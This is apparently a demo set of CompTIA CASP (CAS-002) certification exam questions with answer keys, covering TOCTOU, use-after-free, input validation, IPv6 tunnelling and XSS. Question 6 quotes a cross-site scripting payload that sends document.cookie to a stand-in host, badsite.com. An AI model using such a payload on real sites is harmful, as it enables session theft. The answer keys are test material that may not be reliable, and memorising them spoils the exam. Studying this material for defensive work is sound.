## ISLEVER

## **CAS-002**

CompTIA Advanced Security Practitioner (CASP)

DEMO

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**QUESTION** 1

After being notified of an issue with the online shopping cart, where customers are able to arbitrarily

change the price of listed items, a programmer analyzes the following piece of code used by a web based

shopping cart.

SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES(\$USERINPUT);

The programmer found that every time a user adds an item to the cart, a temporary file is created on the

web server /tmp directory. The temporary file has a name which is generated by concatenating the

content of the \$USERINPUT variable and a timestamp in the form of MM-DD-YYYY, (e.g.

smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which of the following is

MOST likely being exploited to manipulate the price of a shopping cart's items?.

A. Input validation

B. SQL injection

C. TOCTOU

D. Session hijacking

Answer: C

**QUESTION** 2

The administrator is troubleshooting availability issues on an FCoE-based storage array that uses

deduplication. The single controller in the storage array has failed, so the administrator wants to move the

drives to a storage array from a different manufacturer in order to access the data. Which of the following

issues may potentially occur?

A. The data may not be in a usable format.

B. The new storage array is not FCoE based.

C. The data may need a file system check.

D. The new storage array also only has a single controller.

Answer: A

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**QUESTION** 3

Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes

the browser and then allows him to gain remote code execution in the context of the victim's privilege level.

The browser crashes due to an exception error when a heap memory that is unused is accessed. Which

of the following BEST describes the application issue?

A. Integer overflow

B. Click-jacking

C. Race condition

D. SQL injection

E. Use after free

F. Input validation

Answer: E

**QUESTION** 4

A developer is determining the best way to improve security within the code being developed. The

developer is focusing on input fields where customers enter their credit card details. Which of the

following techniques, if implemented in the code, would be the MOST effective in protecting the fields

from malformed input?

A. Client side input validation

B. Stored procedure

C. Encrypting credit card details

D. Regular expression matching

Answer: D

**QUESTION** 5

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A security administrator was doing a packet capture and noticed a system communicating with an

unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6

routing into or out of the network. Which of the following is the BEST course of action?

A. Investigate the network traffic and block UDP port 3544 at the firewall

B. Remove the system from the network and disable IPv6 at the router

C. Locate and remove the unauthorized 6to4 relay from the network

D. Disable the switch port and block the 2001::/32 traffic at the firewall

Answer: A

**QUESTION** 6

A security administrator notices the following line in a server's security log:

<input name='credentials' type='TEXT' value='" +

request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</scri pt>') +

";

The administrator is concerned that it will take the developer a lot of time to fix the application that is

running on the server. Which of the following should the security administrator implement to prevent this

particular attack?

A. WAF

B. Input validation

C. SIEM

D. Sandboxing

E. DAM

Answer: A

**QUESTION** 7

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